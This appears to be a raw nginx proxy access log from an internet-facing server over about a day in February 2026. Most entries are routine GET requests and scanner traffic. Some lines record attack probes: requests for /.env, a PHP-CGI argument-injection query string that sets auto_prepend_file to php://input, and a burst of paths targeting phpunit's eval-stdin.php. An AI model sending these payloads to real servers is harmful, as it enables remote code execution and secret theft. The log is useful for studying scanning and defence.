[Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:17:14:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:17:38:00 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:17:42:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:17:56:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:18:04:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:18:19:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.94.31.224] [Length 0] [Gzip -] "-" "-" -[17/Feb/2026:18:23:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 104.140.148.110] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:18:28:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:18:34:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 46.101.11.153] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[17/Feb/2026:18:34:38 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[17/Feb/2026:18:47:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:18:54:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:18:55:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:19:21:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:19:47:16 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:19:49:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:19:52:05 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:20:11:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:20:12:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:20:36:56 +0000] 400 - GET http 222.117.41.51 "/" [Client 20.64.105.206] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" -[17/Feb/2026:20:36:57 +0000] 400 - - http localhost "-" [Client 20.64.105.206] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:20:37:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:20:58:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:21:01:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:21:06:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 176.65.139.8] [Length 568] [Gzip 1.86] "Linux Gnu (cow)" "-" -[17/Feb/2026:21:25:22 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36" "-" -[17/Feb/2026:21:28:20 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:21:30:48 +0000] 400 - - http localhost "-" [Client 20.14.73.198] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:21:43:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:21:44:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 170.106.15.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[17/Feb/2026:21:54:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:21:58:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:22:08:04 +0000] 400 - - http localhost "-" [Client 176.65.148.19] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:22:20:35 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:22:33:02 +0000] 404 - GET http 222.117.41.51 "/developmentserver/metadatauploader" [Client 52.186.171.52] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[17/Feb/2026:22:36:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:22:37:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:22:44:42 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:23:01:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:23:12:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:23:21:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.130.139.136] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[17/Feb/2026:23:30:35 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:23:33:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:23:36:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:23:56:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:23:59:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:00:06:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:00:07:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[18/Feb/2026:00:26:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:00:29:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:00:53:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:00:53:57 +0000] 405 - POST http 222.117.41.51 "/" [Client 67.213.118.179] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" "-" -[18/Feb/2026:00:53:58 +0000] 405 - POST http 222.117.41.51 "/" [Client 67.213.118.179] [Length 154] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/5.0" "-" -[18/Feb/2026:01:03:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:01:12:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 65.49.1.192] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:01:15:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:01:26:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:01:40:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:01:59:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:02:06:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:02:24:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:02:32:16 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:02:50:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[18/Feb/2026:02:57:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:03:00:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:03:03:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 176.32.195.85] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:03:04:21 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[18/Feb/2026:03:04:21 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[18/Feb/2026:03:04:22 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[18/Feb/2026:03:04:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:03:04:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:03:11:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.131] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:03:11:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.131] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:03:24:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:03:25:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:03:30:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.92.1.85] [Length 0] [Gzip -] "-" "-" -[18/Feb/2026:03:41:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 147.185.133.29] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[18/Feb/2026:03:47:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:04:00:02 +0000] 400 - GET http 222.117.41.51 "/manager/html" [Client 40.124.172.38] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" -[18/Feb/2026:04:00:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:04:03:59 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.95] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[18/Feb/2026:04:14:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:04:16:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:04:17:02 +0000] 400 - - http localhost "-" [Client 40.124.173.171] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:04:17:03 +0000] 400 - - http localhost "-" [Client 40.124.173.171] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:04:37:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 3.82.202.127] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" -[18/Feb/2026:04:37:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:04:50:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 95.215.0.144] [Length 1033] [Gzip -] "fasthttp" "-" -[18/Feb/2026:04:50:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.91.64.7] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:04:50:31 +0000] 404 - GET http 222.117.41.51 "/aaa9" [Client 45.91.64.7] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[18/Feb/2026:04:50:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.91.64.7] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:04:50:31 +0000] 404 - GET http 222.117.41.51 "/aab9" [Client 45.91.64.7] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[18/Feb/2026:04:53:38 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 177.70.2.220] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:04:53:41 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 177.70.2.220] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:04:53:41 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:43 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 177.70.2.220] [Length 154] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:44 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:46 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:48 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:49 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:50 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:52 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:53 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:55 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:56 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:58 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:53:59 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:01 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:02 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:04 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:05 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:07 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:08 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:10 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:11 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:13 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:14 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:15 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:16 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:17 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:18 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 177.70.2.220] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:04:54:19 +0000] 404 